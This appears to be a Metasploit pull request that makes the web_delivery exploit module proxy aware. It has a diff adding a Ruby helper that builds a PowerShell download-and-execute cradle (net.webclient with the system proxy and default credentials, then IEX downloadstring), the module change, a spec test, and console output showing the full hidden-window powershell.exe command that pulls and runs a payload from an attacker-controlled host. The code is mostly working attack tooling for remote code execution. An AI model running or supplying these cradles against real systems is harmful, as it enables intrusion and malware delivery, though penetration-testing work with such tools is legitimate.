### PR TITLE
Make PowerShell Web Delivery Proxy Aware

### DIFF
--- a/lib/rex/powershell/psh_methods.rb
+++ b/lib/rex/powershell/psh_methods.rb
@@ -72,6 +72,22 @@ module Powershell
     def self.ignore_ssl_certificate
       '[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};'
     end
+
+    #
+    # Use the default system web proxy and credentials to download a URL
+    # as a string and execute the contents as PowerShell
+    #
+    # @param url [String] string to download
+    #
+    # @return [String] PowerShell code to download a URL
+    def self.proxy_aware_download_and_exec_string(url)
+      var = Rex::Text.rand_text_alpha(1)
+      cmd = "$#{var}=new-object net.webclient;"
+      cmd << "$#{var}.proxy=[Net.WebRequest]::GetSystemWebProxy();"
+      cmd << "$#{var}.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;"
+      cmd << "IEX $#{var}.downloadstring('#{url}');"
+      cmd
+    end
   end
 end
 end

--- a/modules/exploits/multi/script/web_delivery.rb
+++ b/modules/exploits/multi/script/web_delivery.rb
@@ -89,7 +89,8 @@ class Metasploit3 < Msf::Exploit::Remote
       print_line("python -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"")
     when 'PSH'
       ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
-      download_and_run = "#{ignore_cert}IEX ((new-object net.webclient).downloadstring('#{url}'))"
+      download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)
+      download_and_run = "#{ignore_cert}#{download_string}"
       print_line generate_psh_command_line(
                                              noprofile: true,
                                              windowstyle: 'hidden',

--- a/spec/lib/rex/powershell/psh_methods_spec.rb
+++ b/spec/lib/rex/powershell/psh_methods_spec.rb
@@ -40,5 +40,14 @@ describe Rex::Powershell::PshMethods do
       script.include?('Get-QADComputer').should be_truthy
     end
   end
+  describe "::proxy_aware_download_and_exec_string" do
+    it 'should return some powershell' do
+      url = 'http://blah'
+      script = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)
+      script.should be
+      script.include?(url).should be_truthy
+      script.downcase.include?('downloadstring').should be_truthy
+    end
+  end
 end
 


### PR DESCRIPTION
Adds default credentials and proxy settings to the downloader:

```
msf exploit(web_delivery) > [*] [2015.09.23-20:41:16] Using URL: http://0.0.0.0:8080/QLbXrZip
[*] [2015.09.23-20:41:16] Local IP: http://192.168.72.132:8080/QLbXrZip
[*] [2015.09.23-20:41:16] Server started.
[*] [2015.09.23-20:41:16] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $u=new-object net.webclient;$u.proxy=[Net.WebRequest]::GetSystemWebProxy();$u.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $u.downloadstring('http://192.168.72.132:8080/QLbXrZip');
```

I hate having to remember to add this at times, and its not something you really remember the syntax off by heart for. 
